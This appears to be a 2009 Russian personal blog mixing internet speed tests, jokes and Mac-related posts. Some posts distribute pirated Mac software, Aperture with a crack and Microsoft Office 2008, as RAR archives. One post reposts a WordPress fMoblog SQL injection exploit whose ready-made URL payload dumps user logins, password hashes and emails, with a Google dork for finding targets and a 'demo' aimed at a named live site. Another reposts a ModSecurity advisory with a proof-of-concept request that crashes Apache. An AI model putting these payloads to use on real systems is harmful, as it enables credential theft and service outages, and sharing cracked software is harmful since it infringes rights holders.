• Авторизация


Моя скорость 06-10-2009 00:54


Сегодня измерил скорость моего канала по версии Яндекс

 

[показать]
Я.Интернет. Измерьте вашу скорость.
комментарии: 0 понравилось! вверх^ к полной версии
Скорость моего канала 21-07-2009 21:27


Сегодня измерил скорость моего интернет-канала.
Получилось следующее:http://www.speedtest.net/result/522230196.png
комментарии: 0 понравилось! вверх^ к полной версии

Aperture 2.1.1 15-06-2009 20:11


 Продолжаю выкладывать накопившийся у меня  Mac OS софт.  На этот раз это пакет для обработки фотографий

Aperture 2.1.1.    Apple позиционирует его как программный продукт способный полностью заменить Photoshop.

По мнению большинства профессиональных фотографов,  продукт показывает высочайшее качество в обработке

фотографий  в любом современном формате. Лекарство прилагается.

Aperture_2.1.1_mac.part1.rar

Aperture_2.1.1_mac.part2.rar

Aperture_2.1.1_mac.part3.rar

комментарии: 0 понравилось! вверх^ к полной версии
Без заголовка 12-06-2009 13:43
Слушать этот музыкальный файл

 Pet Shop Boys  "Yes !"

комментарии: 0 понравилось! вверх^ к полной версии
Microsoft Ofice 2008 для Mac OS X 11-06-2009 21:57


С недавнего времени работаю на Mac OS X.  Пробую, привыкаю.

Можно сказать, что уже почти привык, Ось очень нравится  ,

работает быстро, функционал отличный и , что немаловажно,

относительно безопасна.

Решил вот поделиться , может надо кому:  Microsoft Ofice 2008 для Mac OS X

[250x250]

M.O.2008.S.MAC.OSX.epidem.ru.part1.rar

M.O.2008.S.MAC.OSX.epidem.ru.part2.rar

M.O.2008.S.MAC.OSX.epidem.ru.part3.rar

M.O.2008.S.MAC.OSX.epidem.ru.part4.rar

M.O.2008.S.MAC.OSX.epidem.ru.part5.rar

M.O.2008.S.MAC.OSX.epidem.ru.part6.rar

комментарии: 2 понравилось! вверх^ к полной версии
Без заголовка 07-06-2009 12:16


Теперь у меня есть персональная страница на Я.ру — giz-moo!

комментарии: 0 понравилось! вверх^ к полной версии
Мое денежное дерево 31-05-2009 20:38


Привет. Это мое денежное дерево - символ счастья и богатства. Чтобы оно выросло, его нужно полить.

Полить дерево.

[показать]
комментарии: 1 понравилось! вверх^ к полной версии
  Фанаты 30-05-2009 20:09



комментарии: 0 понравилось! вверх^ к полной версии
Смотреть всем 30-05-2009 01:43


 


 

Встретились как-то Mac и PC...

комментарии: 1 понравилось! вверх^ к полной версии
Без заголовка 24-05-2009 14:18


Итак, оружие, наиболее подходящее тебе для захвата мира - Ваш разум
Зачем нужно какое-то оружие, когда есть мозги? С помощью ума, манипулируя людьми и деньгами, и, возможно, даже без единого выстрела, ты совершишь переворот. Возможно, даже никто не узнает о том, что ты теперь правишь миром... Возможно, ты уже им правишь, а об этом просто никто не знает...
Пройти тест
комментарии: 1 понравилось! вверх^ к полной версии
VMware под мак рулит 19-05-2009 21:17


[699x437]

комментарии: 8 понравилось! вверх^ к полной версии
Нашел очень интересную вещь 26-04-2009 17:31


 Находится сие чудо здесь: gizmod.ru/2005/09/14/google_os/.

Кто что думает по этому поводу?

комментарии: 0 понравилось! вверх^ к полной версии
Моя Ь 20-04-2009 21:29


[699x437]

комментарии: 3 понравилось! вверх^ к полной версии
Мы непобедимы 19-04-2009 11:35


[550x363]

комментарии: 1 понравилось! вверх^ к полной версии
Еще прикол 19-04-2009 11:31


[567x491]

комментарии: 1 понравилось! вверх^ к полной версии
Рубиновые рельсы 11-04-2009 02:30


Многие люди знают и поют песню "Рябиновые бусы", а я пою
"Рубиновые рельсы"
комментарии: 2 понравилось! вверх^ к полной версии
Ржака 11-04-2009 02:23


Нашел CMSку под названием Baran-CMS http://www.baran-cms.ir.
Особенно прикольно, что она тоже уязвима. Похоже то ли Иран, то ли
Ирак.
Кодер- БАРАН !
комментарии: 6 понравилось! вверх^ к полной версии
Уязвимость в плагине вордпресса fMoblog 11-04-2009 02:12


#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

комментарии: 1 понравилось! вверх^ к полной версии
Нашел вот прикол 02-04-2009 16:41


[367x489]
комментарии: 3 понравилось! вверх^ к полной версии
ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS) 21-03-2009 22:41


============================================= INTERNET SECURITY AUDITORS ALERT 2009-001 - Original release date: February 25th, 2009 - Last revised: March 19th, 2009 - Discovered by: Juan Galiana Lara - Severity: 7.8/10 (CVSS Base Scored) ============================================= I. VULNERABILITY ------------------------- ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS) II. BACKGROUND ------------------------- ModSecurity is the most widely-deployed web application firewall in the world, with more than 15,000 users. It runs as a Apache web server module and is developed by Breach Security [ http://www.breach.com ], it's avaliable with GNU GPL and many other comercial licenses. III. DESCRIPTION ------------------------- The multipart processor of modsecurity does not sanitize the user supplied input sufficiently. Therefore, an attacker can send a crafted post request of type multipart/form-data which will lead in a remote denial of service. The snippet of vulnerable code: in file msc_multipart.c 1256 int multipart_get_arguments(modsec_rec *msr, char *origin, apr_table_t *arguments) { 1257 multipart_part **parts; 1258 int i; 1259 1260 parts = (multipart_part **)msr->mpd->parts->elts; 1261 for(i = 0; i < msr->mpd->parts->nelts; i++) { 1262 if (parts[i]->type == MULTIPART_FORMDATA) { 1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp, sizeof(msc_arg)); 1264 if (arg == NULL) return -1; 1265 1266 arg->name = parts[i]->name; 1267 arg->name_len = strlen(parts[i]->name); On line 1267, due to the pointer parts[i]->name is not properly sanitized the parameter of strlen function takes the value NULL, getting a segmentation fault and resulting in a crash of the apache process that handle the request. IV. PROOF OF CONCEPT ------------------------- The process could be crashed remotely by sending: POST / HTTP/1.0 Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxxxx Content-Length: 91 -----------------------------xxxxxxxxxxxxxx : -----------------------------xxxxxxxxxxxxxx-- In order to send a correct HTTP/1.1 request you must add a valid Host header. With the configuration directives: SecAuditEngine On SecDebugLogLevel 9 After the attack, the last line of the debug logfile is: [25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9] Multipart: Added part abe458 to the list: name "(null)" (offset 0, length 0) V. BUSINESS IMPACT ------------------------- An attacker could cause a remote denial of service to an Apache installation with modsecurity 2 module. VI. SYSTEMS AFFECTED ------------------------- ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may be affected. Tested with Apache httpd 2.2.11.
комментарии: 0 понравилось! вверх^ к полной версии